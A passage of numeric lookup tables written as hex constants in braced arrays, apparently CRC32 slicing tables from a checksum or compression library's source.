0x2a8fb91300000000, 0x8309efb000000000, 0xdb890d6700000000, 0x9002332d00000000, 0xc882d1fa00000000, 0x6104875900000000, 0x3984658e00000000, 0xf712facd00000000, 0xaf92181a00000000, 0x06144eb900000000, 0x5e94ac6e00000000, 0x151f922400000000, 0x4d9f70f300000000, 0xe419265000000000, 0xbc99c48700000000, 0x6c429df100000000, 0x34c27f2600000000, 0x9d44298500000000, 0xc5c4cb5200000000, 0x8e4ff51800000000, 0xd6cf17cf00000000, 0x7f49416c00000000, 0x27c9a3bb00000000, 0xe95f3cf800000000, 0xb1dfde2f00000000, 0x1859888c00000000, 0x40d96a5b00000000, 0x0b52541100000000, 0x53d2b6c600000000, 0xfa54e06500000000, 0xa2d402b200000000, 0x6679dfe200000000, 0x3ef93d3500000000, 0x977f6b9600000000, 0xcfff894100000000, 0x8474b70b00000000, 0xdcf455dc00000000, 0x7572037f00000000, 0x2df2e1a800000000, 0xe3647eeb00000000, 0xbbe49c3c00000000, 0x1262ca9f00000000, 0x4ae2284800000000, 0x0169160200000000, 0x59e9f4d500000000, 0xf06fa27600000000, 0xa8ef40a100000000}, {0x0000000000000000, 0x463b676500000000, 0x8c76ceca00000000, 0xca4da9af00000000, 0x59ebed4e00000000, 0x1fd08a2b00000000, 0xd59d238400000000, 0x93a644e100000000, 0xb2d6db9d00000000, 0xf4edbcf800000000, 0x3ea0155700000000, 0x789b723200000000, 0xeb3d36d300000000, 0xad0651b600000000, 0x674bf81900000000, 0x21709f7c00000000, 0x25abc6e000000000, 0x6390a18500000000, 0xa9dd082a00000000, 0xefe66f4f00000000, 0x7c402bae00000000, 0x3a7b4ccb00000000, 0xf036e56400000000, 0xb60d820100000000, 0x977d1d7d00000000, 0xd1467a1800000000, 0x1b0bd3b700000000, 0x5d30b4d200000000, 0xce96f03300000000, 0x88ad975600000000, 0x42e03ef900000000, 0x04db599c00000000, 0x0b50fc1a00000000, 0x4d6b9b7f00000000, 0x872632d000000000, 0xc11d55b500000000, 0x52bb115400000000, 0x1480763100000000, 0xdecddf9e00000000, 0x98f6b8fb00000000, 0xb986278700000000, 0xffbd40e200000000, 0x35f0e94d00000000, 0x73cb8e2800000000, 0xe06dcac900000000, 0xa656adac00000000, 0x6c1b040300000000, 0x2a20636600000000, 0x2efb3afa00000000, 0x68c05d9f00000000, 0xa28df43000000000, 0xe4b6935500000000, 0x7710d7b400000000, 0x312bb0d100000000, 0xfb66197e00000000, 0xbd5d7e1b00000000, 0x9c2de16700000000, 0xda16860200000000, 0x105b2fad00000000, 0x566048c800000000, 0xc5c60c2900000000, 0x83fd6b4c00000000, 0x49b0c2e300000000, 0x0f8ba58600000000, 0x16a0f83500000000, 0x509b9f5000000000, 0x9ad636ff00000000, 0xdced519a00000000, 0x4f4b157b00000000, 0x0970721e00000000, 0xc33ddbb100000000, 0x8506bcd400000000, 0xa47623a800000000, 0xe24d44cd00000000, 0x2800ed6200000000, 0x6e3b8a0700000000, 0xfd9dcee600000000, 0xbba6a98300000000, 0x71eb002c00000000, 0x37d0674900000000, 0x330b3ed500000000, 0x753059b000000000, 0xbf7df01f00000000, 0xf946977a00000000, 0x6ae0d39b00000000, 0x2cdbb4fe00000000, 0xe6961d5100000000, 0xa0ad7a3400000000, 0x81dde54800000000, 0xc7e6822d00000000, 0x0dab2b8200000000, 0x4b904ce700000000, 0xd836080600000000, 0x9e0d6f6300000000, 0x5440c6cc00000000, 0x127ba1a900000000, 0x1df0042f00000000, 0x5bcb634a00000000, 0x9186cae500000000, 0xd7bdad8000000000, 0x441be96100000000, 0x02208e0400000000, 0xc86d27ab00000000, 0x8e5640ce00000000, 0xaf26dfb200000000, 0xe91db8d700000000, 0x2350117800000000, 0x656b761d00000000, 0xf6cd32fc00000000, 0xb0f6559900000000, 0x7abbfc3600000000, 0x3c809b5300000000, 0x385bc2cf00000000, 0x7e60a5aa00000000, 0xb42d0c0500000000, 0xf2166b6000000000, 0x61b02f8100000000, 0x278b48e400000000, 0xedc6e14b00000000, 0xabfd862e00000000, 0x8a8d195200000000, 0xccb67e3700000000, 0x06fbd79800000000, 0x40c0b0fd00000000, 0xd366f41c00000000, 0x955d937900000000, 0x5f103ad600000000, 0x192b5db300000000, 0x2c40f16b00000000, 0x6a7b960e00000000, 0xa0363fa100000000, 0xe60d58c400000000, 0x75ab1c2500000000, 0x33907b4000000000, 0xf9ddd2ef00000000, 0xbfe6b58a00000000, 0x9e962af600000000, 0xd8ad4d9300000000, 0x12e0e43c00000000, 0x54db835900000000, 0xc77dc7b800000000, 0x8146a0dd00000000, 0x4b0b097200000000, 0x0d306e1700000000, 0x09eb378b00000000, 0x4fd050ee00000000, 0x859df94100000000, 0xc3a69e2400000000, 0x5000dac500000000, 0x163bbda000000000, 0xdc76140f00000000, 0x9a4d736a00000000, 0xbb3dec1600000000, 0xfd068b7300000000, 0x374b22dc00000000, 0x717045b900000000, 0xe2d6015800000000, 0xa4ed663d00000000, 0x6ea0cf9200000000, 0x289ba8f700000000, 0x27100d7100000000, 0x612b6a1400000000, 0xab66c3bb00000000, 0xed5da4de00000000, 0x7efbe03f00000000, 0x38c0875a00000000, 0xf28d2ef500000000, 0xb4b6499000000000, 0x95c6d6ec00000000, 0xd3fdb18900000000, 0x19b0182600000000, 0x5f8b7f4300000000, 0xcc2d3ba200000000, 0x8a165cc700000000, 0x405bf56800000000, 0x0660920d00000000, 0x02bbcb9100000000, 0x4480acf400000000, 0x8ecd055b00000000, 0xc8f6623e00000000, 0x5b5026df00000000, 0x1d6b41ba00000000, 0xd726e81500000000, 0x911d8f7000000000, 0xb06d100c00000000, 0xf656776900000000, 0x3c1bdec600000000, 0x7a20b9a300000000, 0xe986fd4200000000, 0xafbd9a2700000000, 0x65f0338800000000, 0x23cb54ed00000000, 0x3ae0095e00000000, 0x7cdb6e3b00000000, 0xb696c79400000000, 0xf0ada0f100000000, 0x630be41000000000, 0x2530837500000000, 0xef7d2ada00000000, 0xa9464dbf00000000, 0x8836d2c300000000, 0xce0db5a600000000, 0x04401c0900000000, 0x427b7b6c00000000, 0xd1dd3f8d00000000, 0x97e658e800000000, 0x5dabf14700000000, 0x1b90962200000000, 0x1f4bcfbe00000000, 0x5970a8db00000000, 0x933d017400000000, 0xd506661100000000, 0x46a022f000000000, 0x009b459500000000, 0xcad6ec3a00000000, 0x8ced8b5f00000000, 0xad9d142300000000, 0xeba6734600000000, 0x21ebdae900000000, 0x67d0bd8c00000000, 0xf476f96d00000000, 0xb24d9e0800000000, 0x780037a700000000, 0x3e3b50c200000000, 0x31b0f54400000000, 0x778b922100000000, 0xbdc63b8e00000000, 0xfbfd5ceb00000000, 0x685b180a00000000, 0x2e607f6f00000000, 0xe42dd6c000000000, 0xa216b1a500000000, 0x83662ed900000000, 0xc55d49bc00000000, 0x0f10e01300000000, 0x492b877600000000, 0xda8dc39700000000, 0x9cb6a4f200000000, 0x56fb0d5d00000000, 0x10c06a3800000000, 0x141b33a400000000, 0x522054c100000000, 0x986dfd6e00000000, 0xde569a0b00000000, 0x4df0deea00000000, 0x0bcbb98f00000000, 0xc186102000000000, 0x87bd774500000000, 0xa6cde83900000000, 0xe0f68f5c00000000, 0x2abb26f300000000, 0x6c80419600000000, 0xff26057700000000, 0xb91d621200000000, 0x7350cbbd00000000, 0x356bacd800000000}, {0x0000000000000000, 0x9e83da9f00000000, 0x7d01c4e400000000, 0xe3821e7b00000000, 0xbb04f91200000000, 0x2587238d00000000, 0xc6053df600000000, 0x5886e76900000000, 0x7609f22500000000, 0xe88a28ba00000000, 0x0b0836c100000000, 0x958bec5e00000000, 0xcd0d0b3700000000, 0x538ed1a800000000, 0xb00ccfd300000000, 0x2e8f154c00000000, 0xec12e44b00000000, 0x72913ed400000000, 0x911320af00000000, 0x0f90fa3000000000, 0x57161d5900000000, 0xc995c7c600000000, 0x2a17d9bd00000000, 0xb494032200000000, 0x9a1b166e00000000, 0x0498ccf100000000, 0xe71ad28a00000000, 0x7999081500000000, 0x211fef7c00000000, 0xbf9c35e300000000, 0x5c1e2b9800000000, 0xc29df10700000000, 0xd825c89700000000, 0x46a6120800000000, 0xa5240c7300000000, 0x3ba7d6ec00000000, 0x6321318500000000, 0xfda2eb1a00000000, 0x1e20f56100000000, 0x80a32ffe00000000, 0xae2c3ab200000000, 0x30afe02d00000000, 0xd32dfe5600000000, 0x4dae24c900000000, 0x1528c3a000000000, 0x8bab193f00000000, 0x6829074400000000, 0xf6aadddb00000000, 0x34372cdc00000000, 0xaab4f64300000000, 0x4936e83800000000, 0xd7b532a700000000, 0x8f33d5ce00000000, 0x11b00f5100000000, 0xf232112a00000000, 0x6cb1cbb500000000, 0x423edef900000000, 0xdcbd046600000000, 0x3f3f1a1d00000000, 0xa1bcc08200000000, 0xf93a27eb00000000, 0x67b9fd7400000000, 0x843be30f00000000, 0x1ab8399000000000, 0xf14de1f400000000, 0x6fce3b6b00000000, 0x8c4c251000000000, 0x12cfff8f00000000, 0x4a4918e600000000, 0xd4cac27900000000, 0x3748dc0200000000, 0xa9cb069d00000000, 0x874413d100000000, 0x19c7c94e00000000, 0xfa45d73500000000, 0x64c60daa00000000, 0x3c40eac300000000, 0xa2c3305c00000000, 0x41412e2700000000, 0xdfc2f4b800000000, 0x1d5f05bf00000000, 0x83dcdf2000000000, 0x605ec15b00000000, 0xfedd1bc400000000, 0xa65bfcad00000000, 0x38d8263200000000, 0xdb5a384900000000, 0x45d9e2d600000000, 0x6b56f79a00000000, 0xf5d52d0500000000, 0x1657337e00000000, 0x88d4e9e100000000, 0xd0520e8800000000, 0x4ed1d41700000000, 0xad53ca6c00000000, 0x33d010f300000000, 0x2968296300000000, 0xb7ebf3fc00000000, 0x5469ed8700000000, 0xcaea371800000000, 0x926cd07100000000, 0x0cef0aee00000000, 0xef6d149500000000, 0x71eece0a00000000, 0x5f61db4600000000, 0xc1e201d900000000, 0x22601fa200000000, 0xbce3c53d00000000, 0xe465225400000000, 0x7ae6f8cb00000000, 0x9964e6b000000000, 0x07e73c2f00000000, 0xc57acd2800000000, 0x5bf917b700000000, 0xb87b09cc00000000, 0x26f8d35300000000, 0x7e7e343a00000000, 0xe0fdeea500000000, 0x037ff0de00000000, 0x9dfc2a4100000000, 0xb3733f0d00000000, 0x2df0e59200000000, 0xce72fbe900000000, 0x50f1217600000000, 0x0877c61f00000000, 0x96f41c8000000000, 0x757602fb00000000, 0xebf5d86400000000, 0xa39db33200000000, 0x3d1e69ad00000000, 0xde9c77d600000000, 0x401fad4900000000, 0x18994a2000000000, 0x861a90bf00000000, 0x65988ec400000000, 0xfb1b545b00000000, 0xd594411700000000, 0x4b179b8800000000, 0xa89585f300000000, 0x36165f6c00000000, 0x6e90b80500000000, 0xf013629a00000000, 0x13917ce100000000, 0x8d12a67e00000000, 0x4f8f577900000000, 0xd10c8de600000000, 0x328e939d00000000, 0xac0d490200000000, 0xf48bae6b00000000, 0x6a0874f400000000, 0x898a6a8f00000000, 0x1709b01000000000, 0x3986a55c00000000, 0xa7057fc300000000, 0x448761b800000000, 0xda04bb2700000000, 0x82825c4e00000000, 0x1c0186d100000000, 0xff8398aa00000000, 0x6100423500000000, 0x7bb87ba500000000, 0xe53ba13a00000000, 0x06b9bf4100000000, 0x983a65de00000000, 0xc0bc82b700000000, 0x5e3f582800000000, 0xbdbd465300000000, 0x233e9ccc00000000, 0x0db1898000000000, 0x9332531f00000000, 0x70b04d6400000000, 0xee3397fb00000000, 0xb6b5709200000000, 0x2836aa0d00000000, 0xcbb4b47600000000, 0x55376ee900000000, 0x97aa9fee00000000, 0x0929457100000000, 0xeaab5b0a00000000, 0x7428819500000000, 0x2cae66fc00000000, 0xb22dbc6300000000, 0x51afa21800000000, 0xcf2c788700000000, 0xe1a36dcb00000000, 0x7f20b75400000000, 0x9ca2a92f00000000, 0x022173b000000000, 0x5aa794d900000000, 0xc4244e4600000000, 0x27a6503d00000000, 0xb9258aa200000000, 0x52d052c600000000, 0xcc53885900000000, 0x2fd1962200000000, 0xb1524cbd00000000, 0xe9d4abd400000000, 0x7757714b00000000, 0x94d56f3000000000, 0x0a56b5af00000000, 0x24d9a0e300000000, 0xba5a7a7c00000000, 0x59d8640700000000, 0xc75bbe9800000000, 0x9fdd59f100000000, 0x015e836e00000000, 0xe2dc9d1500000000, 0x7c5f478a00000000, 0xbec2b68d00000000, 0x20416c1200000000, 0xc3c3726900000000, 0x5d40a8f600000000, 0x05c64f9f00000000, 0x9b45950000000000, 0x78c78b7b00000000, 0xe64451e400000000, 0xc8cb44a800000000, 0x56489e3700000000, 0xb5ca804c00000000, 0x2b495ad300000000, 0x73cfbdba00000000, 0xed4c672500000000, 0x0ece795e00000000, 0x904da3c100000000, 0x8af59a5100000000, 0x147640ce00000000, 0xf7f45eb500000000, 0x6977842a00000000, 0x31f1634300000000, 0xaf72b9dc00000000, 0x4cf0a7a700000000, 0xd2737d3800000000, 0xfcfc687400000000, 0x627fb2eb00000000, 0x81fdac9000000000, 0x1f7e760f00000000, 0x47f8916600000000, 0xd97b4bf900000000, 0x3af9558200000000, 0xa47a8f1d00000000, 0x66e77e1a00000000, 0xf864a48500000000, 0x1be6bafe00000000, 0x8565606100000000, 0xdde3870800000000, 0x43605d9700000000, 0xa0e243ec00000000, 0x3e61997300000000, 0x10ee8c3f00000000, 0x8e6d56a000000000, 0x6def48db00000000, 0xf36c924400000000, 0xabea752d00000000, 0x3569afb200000000, 0xd6ebb1c900000000, 0x48686b5600000000}, {0x0000000000000000, 0xc064281700000000, 0x80c9502e00000000, 0x40ad783900000000, 0x0093a15c00000000, 0xc0f7894b00000000, 0x805af17200000000, 0x403ed96500000000, 0x002643b900000000, 0xc0426bae00000000, 0x80ef139700000000, 0x408b3b8000000000, 0x00b5e2e500000000, 0xc0d1caf200000000, 0x807cb2cb00000000, 0x40189adc00000000, 0x414af7a900000000, 0x812edfbe00000000, 0xc183a78700000000, 0x01e78f9000000000, 0x41d956f500000000, 0x81bd7ee200000000, 0xc11006db00000000, 0x01742ecc00000000, 0x416cb41000000000, 0x81089c0700000000, 0xc1a5e43e00000000, 0x01c1cc2900000000, 0x41ff154c00000000, 0x819b3d5b00000000, 0xc136456200000000, 0x01526d7500000000, 0xc3929f8800000000, 0x03f6b79f00000000, 0x435bcfa600000000, 0x833fe7b100000000, 0xc3013ed400000000, 0x036516c300000000, 0x43c86efa00000000, 0x83ac46ed00000000, 0xc3b4dc3100000000, 0x03d0f42600000000, 0x437d8c1f00000000, 0x8319a40800000000, 0xc3277d6d00000000, 0x0343557a00000000, 0x43ee2d4300000000, 0x838a055400000000, 0x82d8682100000000, 0x42bc403600000000, 0x0211380f00000000, 0xc275101800000000, 0x824bc97d00000000, 0x422fe16a00000000, 0x0282995300000000, 0xc2e6b14400000000, 0x82fe2b9800000000, 0x429a038f00000000, 0x02377bb600000000, 0xc25353a100000000, 0x826d8ac400000000, 0x4209a2d300000000, 0x02a4daea00000000, 0xc2c0f2fd00000000, 0xc7234eca00000000, 0x074766dd00000000, 0x47ea1ee400000000, 0x878e36f300000000, 0xc7b0ef9600000000, 0x07d4c78100000000, 0x4779bfb800000000, 0x871d97af00000000, 0xc7050d7300000000, 0x0761256400000000, 0x47cc5d5d00000000, 0x87a8754a00000000, 0xc796ac2f00000000, 0x07f2843800000000, 0x475ffc0100000000, 0x873bd41600000000, 0x8669b96300000000, 0x460d917400000000, 0x06a0e94d00000000, 0xc6c4c15a00000000, 0x86fa183f00000000, 0x469e302800000000, 0x0633481100000000, 0xc657600600000000, 0x864ffada00000000, 0x462bd2cd00000000, 0x0686aaf400000000, 0xc6e282e300000000, 0x86dc5b8600000000, 0x46b8739100000000, 0x06150ba800000000, 0xc67123bf00000000, 0x04b1d14200000000, 0xc4d5f95500000000, 0x8478816c00000000, 0x441ca97b00000000, 0x0422701e00000000, 0xc446580900000000, 0x84eb203000000000, 0x448f082700000000, 0x049792fb00000000, 0xc4f3baec00000000, 0x845ec2d500000000, 0x443aeac200000000, 0x040433a700000000, 0xc4601bb000000000, 0x84cd638900000000, 0x44a94b9e00000000, 0x45fb26eb00000000, 0x859f0efc00000000, 0xc53276c500000000, 0x05565ed200000000, 0x456887b700000000, 0x850cafa000000000, 0xc5a1d79900000000, 0x05c5ff8e00000000, 0x45dd655200000000, 0x85b94d4500000000, 0xc514357c00000000, 0x05701d6b00000000, 0x454ec40e00000000, 0x852aec1900000000, 0xc587942000000000, 0x05e3bc3700000000, 0xcf41ed4f00000000, 0x0f25c55800000000, 0x4f88bd6100000000, 0x8fec957600000000, 0xcfd24c1300000000, 0x0fb6640400000000, 0x4f1b1c3d00000000, 0x8f7f342a00000000, 0xcf67aef600000000, 0x0f0386e100000000, 0x4faefed800000000, 0x8fcad6cf00000000, 0xcff40faa00000000, 0x0f9027bd00000000, 0x4f3d5f8400000000, 0x8f59779300000000, 0x8e0b1ae600000000, 0x4e6f32f100000000, 0x0ec24ac800000000, 0xcea662df00000000, 0x8e98bbba00000000, 0x4efc93ad00000000, 0x0e51eb9400000000, 0xce35c38300000000, 0x8e2d595f00000000, 0x4e49714800000000, 0x0ee4097100000000, 0xce80216600000000, 0x8ebef80300000000, 0x4edad01400000000, 0x0e77a82d00000000, 0xce13803a00000000, 0x0cd372c700000000, 0xccb75ad000000000, 0x8c1a22e900000000, 0x4c7e0afe00000000, 0x0c40d39b00000000, 0xcc24fb8c00000000, 0x8c8983b500000000, 0x4cedaba200000000, 0x0cf5317e00000000, 0xcc91196900000000, 0x8c3c615000000000, 0x4c58494700000000, 0x0c66902200000000, 0xcc02b83500000000, 0x8cafc00c00000000, 0x4ccbe81b00000000, 0x4d99856e00000000, 0x8dfdad7900000000, 0xcd50d54000000000, 0x0d34fd5700000000, 0x4d0a243200000000, 0x8d6e0c2500000000, 0xcdc3741c00000000, 0x0da75c0b00000000, 0x4dbfc6d700000000, 0x8ddbeec000000000, 0xcd7696f900000000, 0x0d12beee00000000, 0x4d2c678b00000000, 0x8d484f9c00000000, 0xcde537a500000000, 0x0d811fb200000000, 0x0862a38500000000, 0xc8068b9200000000, 0x88abf3ab00000000, 0x48cfdbbc00000000, 0x08f102d900000000, 0xc8952ace00000000, 0x883852f700000000, 0x485c7ae000000000, 0x0844e03c00000000, 0xc820c82b00000000, 0x888db01200000000, 0x48e9980500000000, 0x08d7416000000000, 0xc8b3697700000000, 0x881e114e00000000, 0x487a395900000000, 0x4928542c00000000, 0x894c7c3b00000000, 0xc9e1040200000000, 0x09852c1500000000, 0x49bbf57000000000, 0x89dfdd6700000000, 0xc972a55e00000000, 0x09168d4900000000, 0x490e179500000000, 0x896a3f8200000000, 0xc9c747bb00000000, 0x09a36fac00000000, 0x499db6c900000000, 0x89f99ede00000000, 0xc954e6e700000000, 0x0930cef000000000, 0xcbf03c0d00000000, 0x0b94141a00000000, 0x4b396c2300000000, 0x8b5d443400000000, 0xcb639d5100000000, 0x0b07b54600000000, 0x4baacd7f00000000, 0x8bcee56800000000, 0xcbd67fb400000000, 0x0bb257a300000000, 0x4b1f2f9a00000000, 0x8b7b078d00000000, 0xcb45dee800000000, 0x0b21f6ff00000000, 0x4b8c8ec600000000, 0x8be8a6d100000000, 0x8abacba400000000, 0x4adee3b300000000, 0x0a739b8a00000000, 0xca17b39d00000000, 0x8a296af800000000, 0x4a4d42ef00000000, 0x0ae03ad600000000, 0xca8412c100000000, 0x8a9c881d00000000, 0x4af8a00a00000000, 0x0a55d83300000000, 0xca31f02400000000, 0x8a0f294100000000, 0x4a6b015600000000, 0x0ac6796f00000000, 0xcaa2517800000000}, {0x0000000000000000, 0xd4ea739b00000000, 0xe9d396ed00000000, 0x3d39e57600000000, 0x93a15c0000000000, 0x474b2f9b00000000, 0x7a72caed00000000, 0xae98b97600000000, 0x2643b90000000000, 0xf2a9ca9b00000000, 0xcf902fed00000000, 0x1b7a5c7600000000, 0xb5e2e50000000000, 0x6108969b00000000, 0x5c3173ed00000000, 0x88db007600000000, 0x4c86720100000000, 0x986c019a00000000, 0xa555e4ec00000000, 0x71bf977700000000, 0xdf272e0100000000, 0x0bcd5d9a00000000, 0x36f4b8ec00000000, 0xe21ecb7700000000, 0x6ac5cb0100000000, 0xbe2fb89a00000000, 0x83165dec00000000, 0x57fc2e7700000000, 0xf964970100000000, 0x2d8ee49a00000000, 0x10b701ec00000000, 0xc45d727700000000, 0x980ce50200000000, 0x4ce6969900000000, 0x71df73ef00000000, 0xa535007400000000, 0x0badb90200000000, 0xdf47ca9900000000, 0xe27e2fef00000000, 0x36945c7400000000, 0xbe4f5c0200000000, 0x6aa52f9900000000, 0x579ccaef00000000, 0x8376b97400000000, 0x2dee000200000000, 0xf904739900000000, 0xc43d96ef00000000, 0x10d7e57400000000, 0xd48a970300000000, 0x0060e49800000000, 0x3d5901ee00000000, 0xe9b3727500000000, 0x472bcb0300000000, 0x93c1b89800000000, 0xaef85dee00000000, 0x7a122e7500000000, 0xf2c92e0300000000, 0x26235d9800000000, 0x1b1ab8ee00000000, 0xcff0cb7500000000, 0x6168720300000000, 0xb582019800000000, 0x88bbe4ee00000000, 0x5c51977500000000, 0x3019ca0500000000, 0xe4f3b99e00000000, 0xd9ca5ce800000000, 0x0d202f7300000000, 0xa3b8960500000000, 0x7752e59e00000000, 0x4a6b00e800000000, 0x9e81737300000000, 0x165a730500000000, 0xc2b0009e00000000, 0xff89e5e800000000, 0x2b63967300000000, 0x85fb2f0500000000, 0x51115c9e00000000, 0x6c28b9e800000000, 0xb8c2ca7300000000, 0x7c9fb80400000000, 0xa875cb9f00000000, 0x954c2ee900000000, 0x41a65d7200000000, 0xef3ee40400000000, 0x3bd4979f00000000, 0x06ed72e900000000, 0xd207017200000000, 0x5adc010400000000, 0x8e36729f00000000, 0xb30f97e900000000, 0x67e5e47200000000, 0xc97d5d0400000000, 0x1d972e9f00000000, 0x20aecbe900000000, 0xf444b87200000000, 0xa8152f0700000000, 0x7cff5c9c00000000, 0x41c6b9ea00000000, 0x952cca7100000000, 0x3bb4730700000000, 0xef5e009c00000000, 0xd267e5ea00000000, 0x068d967100000000, 0x8e56960700000000, 0x5abce59c00000000, 0x678500ea00000000, 0xb36f737100000000, 0x1df7ca0700000000, 0xc91db99c00000000, 0xf4245cea00000000, 0x20ce2f7100000000, 0xe4935d0600000000, 0x30792e9d00000000, 0x0d40cbeb00000000, 0xd9aab87000000000, 0x7732010600000000, 0xa3d8729d00000000, 0x9ee197eb00000000, 0x4a0be47000000000, 0xc2d0e40600000000, 0x163a979d00000000, 0x2b0372eb00000000, 0xffe9017000000000, 0x5171b80600000000, 0x859bcb9d00000000, 0xb8a22eeb00000000, 0x6c485d7000000000, 0x6032940b00000000, 0xb4d8e79000000000, 0x89e102e600000000, 0x5d0b717d00000000, 0xf393c80b00000000, 0x2779bb9000000000, 0x1a405ee600000000, 0xceaa2d7d00000000, 0x46712d0b00000000, 0x929b5e9000000000, 0xafa2bbe600000000, 0x7b48c87d00000000, 0xd5d0710b00000000, 0x013a029000000000, 0x3c03e7e600000000, 0xe8e9947d00000000, 0x2cb4e60a00000000, 0xf85e959100000000, 0xc56770e700000000, 0x118d037c00000000, 0xbf15ba0a00000000, 0x6bffc99100000000, 0x56c62ce700000000, 0x822c5f7c00000000, 0x0af75f0a00000000, 0xde1d2c9100000000, 0xe324c9e700000000, 0x37ceba7c00000000, 0x9956030a00000000, 0x4dbc709100000000, 0x708595e700000000, 0xa46fe67c00000000, 0xf83e710900000000, 0x2cd4029200000000, 0x11ede7e400000000, 0xc507947f00000000, 0x6b9f2d0900000000, 0xbf755e9200000000, 0x824cbbe400000000, 0x56a6c87f00000000, 0xde7dc80900000000, 0x0a97bb9200000000, 0x37ae5ee400000000, 0xe3442d7f00000000, 0x4ddc940900000000, 0x9936e79200000000, 0xa40f02e400000000, 0x70e5717f00000000, 0xb4b8030800000000, 0x6052709300000000, 0x5d6b95e500000000, 0x8981e67e00000000, 0x27195f0800000000, 0xf3f32c9300000000, 0xcecac9e500000000, 0x1a20ba7e00000000, 0x92fbba0800000000, 0x4611c99300000000, 0x7b282ce500000000, 0xafc25f7e00000000, 0x015ae60800000000, 0xd5b0959300000000, 0xe88970e500000000, 0x3c63037e00000000, 0x502b5e0e00000000, 0x84c12d9500000000, 0xb9f8c8e300000000, 0x6d12bb7800000000, 0xc38a020e00000000, 0x1760719500000000, 0x2a5994e300000000, 0xfeb3e77800000000, 0x7668e70e00000000, 0xa282949500000000, 0x9fbb71e300000000, 0x4b51027800000000, 0xe5c9bb0e00000000, 0x3123c89500000000, 0x0c1a2de300000000, 0xd8f05e7800000000, 0x1cad2c0f00000000, 0xc8475f9400000000, 0xf57ebae200000000, 0x2194c97900000000, 0x8f0c700f00000000, 0x5be6039400000000, 0x66dfe6e200000000, 0xb235957900000000, 0x3aee950f00000000, 0xee04e69400000000, 0xd33d03e200000000, 0x07d7707900000000, 0xa94fc90f00000000, 0x7da5ba9400000000, 0x409c5fe200000000, 0x94762c7900000000, 0xc827bb0c00000000, 0x1ccdc89700000000, 0x21f42de100000000, 0xf51e5e7a00000000, 0x5b86e70c00000000, 0x8f6c949700000000, 0xb25571e100000000, 0x66bf027a00000000, 0xee64020c00000000, 0x3a8e719700000000, 0x07b794e100000000, 0xd35de77a00000000, 0x7dc55e0c00000000, 0xa92f2d9700000000, 0x9416c8e100000000, 0x40fcbb7a00000000, 0x84a1c90d00000000, 0x504bba9600000000, 0x6d725fe000000000, 0xb9982c7b00000000, 0x1700950d00000000, 0xc3eae69600000000, 0xfed303e000000000, 0x2a39707b00000000, 0xa2e2700d00000000, 0x7608039600000000, 0x4b31e6e000000000, 0x9fdb957b00000000, 0x31432c0d00000000, 0xe5a95f9600000000, 0xd890bae000000000, 0x0c7ac97b00000000}, {0x0000000000000000, 0x2765258100000000, 0x0fcc3bd900000000, 0x28a91e5800000000, 0x5f9e066900000000, 0x78fb23e800000000, 0x50523db000000000, 0x7737183100000000, 0xbe3c0dd200000000, 0x9959285300000000, 0xb1f0360b00000000, 0x9695138a00000000, 0xe1a20bbb00000000, 0xc6c72e3a00000000, 0xee6e306200000000, 0xc90b15e300000000, 0x3d7f6b7f00000000, 0x1a1a4efe00000000, 0x32b350a600000000, 0x15d6752700000000, 0x62e16d1600000000, 0x4584489700000000, 0x6d2d56cf00000000, 0x4a48734e00000000, 0x834366ad00000000, 0xa426432c00000000, 0x8c8f5d7400000000, 0xabea78f500000000, 0xdcdd60c400000000, 0xfbb8454500000000, 0xd3115b1d00000000, 0xf4747e9c00000000, 0x7afed6fe00000000, 0x5d9bf37f00000000, 0x7532ed2700000000, 0x5257c8a600000000, 0x2560d09700000000, 0x0205f51600000000, 0x2aaceb4e00000000, 0x0dc9cecf00000000, 0xc4c2db2c00000000, 0xe3a7fead00000000, 0xcb0ee0f500000000, 0xec6bc57400000000, 0x9b5cdd4500000000, 0xbc39f8c400000000, 0x9490e69c00000000, 0xb3f5c31d00000000, 0x4781bd8100000000, 0x60e4980000000000, 0x484d865800000000, 0x6f28a3d900000000, 0x181fbbe800000000, 0x3f7a9e6900000000, 0x17d3803100000000, 0x30b6a5b000000000, 0xf9bdb05300000000, 0xded895d200000000, 0xf6718b8a00000000, 0xd114ae0b00000000, 0xa623b63a00000000, 0x814693bb00000000, 0xa9ef8de300000000, 0x8e8aa86200000000, 0xb5fadc2600000000, 0x929ff9a700000000, 0xba36e7ff00000000, 0x9d53c27e00000000, 0xea64da4f00000000, 0xcd01ffce00000000, 0xe5a8e19600000000, 0xc2cdc41700000000, 0x0bc6d1f400000000, 0x2ca3f47500000000, 0x040aea2d00000000, 0x236fcfac00000000, 0x5458d79d00000000, 0x733df21c00000000, 0x5b94ec4400000000, 0x7cf1c9c500000000, 0x8885b75900000000, 0xafe092d800000000, 0x87498c8000000000, 0xa02ca90100000000, 0xd71bb13000000000, 0xf07e94b100000000, 0xd8d78ae900000000, 0xffb2af6800000000, 0x36b9ba8b00000000, 0x11dc9f0a00000000, 0x3975815200000000, 0x1e10a4d300000000, 0x6927bce200000000, 0x4e42996300000000, 0x66eb873b00000000, 0x418ea2ba00000000, 0xcf040ad800000000, 0xe8612f5900000000, 0xc0c8310100000000, 0xe7ad148000000000, 0x909a0cb100000000, 0xb7ff293000000000, 0x9f56376800000000, 0xb83312e900000000, 0x7138070a00000000, 0x565d228b00000000, 0x7ef43cd300000000, 0x5991195200000000, 0x2ea6016300000000, 0x09c324e200000000, 0x216a3aba00000000, 0x060f1f3b00000000, 0xf27b61a700000000, 0xd51e442600000000, 0xfdb75a7e00000000, 0xdad27fff00000000, 0xade567ce00000000, 0x8a80424f00000000, 0xa2295c1700000000, 0x854c799600000000, 0x4c476c7500000000, 0x6b2249f400000000, 0x438b57ac00000000, 0x64ee722d00000000, 0x13d96a1c00000000, 0x34bc4f9d00000000, 0x1c1551c500000000, 0x3b70744400000000, 0x6af5b94d00000000, 0x4d909ccc00000000, 0x6539829400000000, 0x425ca71500000000, 0x356bbf2400000000, 0x120e9aa500000000, 0x3aa784fd00000000, 0x1dc2a17c00000000, 0xd4c9b49f00000000, 0xf3ac911e00000000, 0xdb058f4600000000, 0xfc60aac700000000, 0x8b57b2f600000000, 0xac32977700000000, 0x849b892f00000000, 0xa3feacae00000000, 0x578ad23200000000, 0x70eff7b300000000, 0x5846e9eb00000000, 0x7f23cc6a00000000, 0x0814d45b00000000, 0x2f71f1da00000000, 0x07d8ef8200000000, 0x20bdca0300000000, 0xe9b6dfe000000000, 0xced3fa6100000000, 0xe67ae43900000000, 0xc11fc1b800000000, 0xb628d98900000000, 0x914dfc0800000000, 0xb9e4e25000000000, 0x9e81c7d100000000, 0x100b6fb300000000, 0x376e4a3200000000, 0x1fc7546a00000000, 0x38a271eb00000000, 0x4f9569da00000000, 